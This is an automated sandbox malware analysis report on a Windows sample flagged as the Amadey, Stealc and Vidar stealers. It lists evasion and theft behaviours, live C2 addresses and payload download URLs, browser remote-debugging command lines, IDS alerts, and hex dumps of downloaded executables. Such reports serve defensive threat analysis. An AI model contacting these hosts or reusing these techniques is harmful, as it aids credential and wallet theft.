Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
E89hSGjVrv.exe

Overview

General Information

Sample name:E89hSGjVrv.exe
renamed because original name is a hash value
Original sample name:136dfe4a8f2801c7836bb2518b2eb57142e57efb77a665830a00335fdfe0c2bd.exe
Analysis ID:1559850
MD5:d90a0fa7d1b136c6aaa035f6bc5602fa
SHA1:1e236ca8b781f344a4738c1810b3c819ec72fac5
SHA256:136dfe4a8f2801c7836bb2518b2eb57142e57efb77a665830a00335fdfe0c2bd
Infos:

Detection

Amadey, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Yara detected Credential Stealer

Classification

  • System is w10x64
  • E89hSGjVrv.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\E89hSGjVrv.exe" MD5: D90A0FA7D1B136C6AAA035F6BC5602FA)
    • chrome.exe (PID: 6640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2320,i,9541969784439426641,9290128447048775784,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • msedge.exe (PID: 7924 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 8144 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2584 --field-trial-handle=2292,i,7521651601030041477,18299988415420470262,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • cmd.exe (PID: 9152 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCAFHDBGHJK.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 9160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • DocumentsCAFHDBGHJK.exe (PID: 9204 cmdline: "C:\Users\user\DocumentsCAFHDBGHJK.exe" MD5: FBE6E564AF67243480309BCB73FD7856)
        • skotes.exe (PID: 8592 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: FBE6E564AF67243480309BCB73FD7856)
  • msedge.exe (PID: 8176 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7728 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2284 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6368 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8208 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6656 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7524 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6540 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • skotes.exe (PID: 8668 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: FBE6E564AF67243480309BCB73FD7856)
  • skotes.exe (PID: 5396 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: FBE6E564AF67243480309BCB73FD7856)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000018.00000003.3216524744.0000000004AB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000000.00000003.2073713588.0000000005520000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000016.00000003.2599736204.00000000048A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000000.00000002.2588765991.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.2593879213.00000000015EC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 11 entries

              System Summary

              barindex
              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\E89hSGjVrv.exe", ParentImage: C:\Users\user\Desktop\E89hSGjVrv.exe, ParentProcessId: 5480, ParentProcessName: E89hSGjVrv.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 6640, ProcessName: chrome.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T00:49:10.845439+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.549704TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T00:49:10.723073+010020442441Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T00:49:11.186378+010020442461Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T00:49:12.903829+010020442481Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T00:49:11.318942+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.549704TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T00:49:10.259311+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T00:51:04.999541+010028561471A Network Trojan was detected192.168.2.550089185.215.113.4380TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T00:49:00.753657+010028561221A Network Trojan was detected185.215.113.4380192.168.2.550095TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T00:51:09.550411+010028033053Unknown Traffic192.168.2.55010131.41.244.1180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T00:49:13.654005+010028033043Unknown Traffic192.168.2.549704185.215.113.20680TCP
              2024-11-21T00:49:36.726048+010028033043Unknown Traffic192.168.2.549773185.215.113.20680TCP
              2024-11-21T00:49:38.815700+010028033043Unknown Traffic192.168.2.549773185.215.113.20680TCP
              2024-11-21T00:49:40.191088+010028033043Unknown Traffic192.168.2.549773185.215.113.20680TCP
              2024-11-21T00:49:41.366888+010028033043Unknown Traffic192.168.2.549773185.215.113.20680TCP
              2024-11-21T00:49:45.253488+010028033043Unknown Traffic192.168.2.549773185.215.113.20680TCP
              2024-11-21T00:49:46.375478+010028033043Unknown Traffic192.168.2.549773185.215.113.20680TCP
              2024-11-21T00:49:52.357533+010028033043Unknown Traffic192.168.2.549901185.215.113.1680TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: E89hSGjVrv.exeAvira: detected
              Source: http://31.41.244.11/files/random.exe$Avira URL Cloud: Label: phishing
              Source: http://31.41.244.11/files/random.exe07797001Avira URL Cloud: Label: phishing
              Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllKAvira URL Cloud: Label: malware
              Source: http://31.41.244.11/files/random.exe1Avira URL Cloud: Label: phishing
              Source: http://31.41.244.11/Avira URL Cloud: Label: phishing
              Source: http://31.41.244.11/215.113.43/Zu7JuNko/index.phpAvira URL Cloud: Label: phishing
              Source: http://31.41.244.11/files/random.exephpAvira URL Cloud: Label: phishing
              Source: http://185.215.113.206/68b591d6548ec281/nss3.dllOAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/68b591d6548ec281/freebl3.dlloAvira URL Cloud: Label: malware
              Source: 00000018.00000003.3216524744.0000000004AB0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
              Source: E89hSGjVrv.exe.5480.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Source: E89hSGjVrv.exeReversingLabs: Detection: 83%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: E89hSGjVrv.exeJoe Sandbox ML: detected
              Source: E89hSGjVrv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.126.31.71:443 -> 192.168.2.5:49766 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.126.31.71:443 -> 192.168.2.5:49812 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.5:49948 version: TLS 1.2
              Source: Binary string: mozglue.pdbP source: E89hSGjVrv.exe, 00000000.00000002.2625912416.000000006C57D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: nss3.pdb@ source: E89hSGjVrv.exe, 00000000.00000002.2626413692.000000006C73F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
              Source: Binary string: nss3.pdb source: E89hSGjVrv.exe, 00000000.00000002.2626413692.000000006C73F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: mozglue.pdb source: E89hSGjVrv.exe, 00000000.00000002.2625912416.000000006C57D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: chrome.exeMemory has grown: Private usage: 1MB later: 38MB

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
              Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
              Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49704
              Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49704
              Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.206:80
              Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50089 -> 185.215.113.43:80
              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50095
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: Malware configuration extractorIPs: 185.215.113.43
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 23:49:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 23:49:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 23:49:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 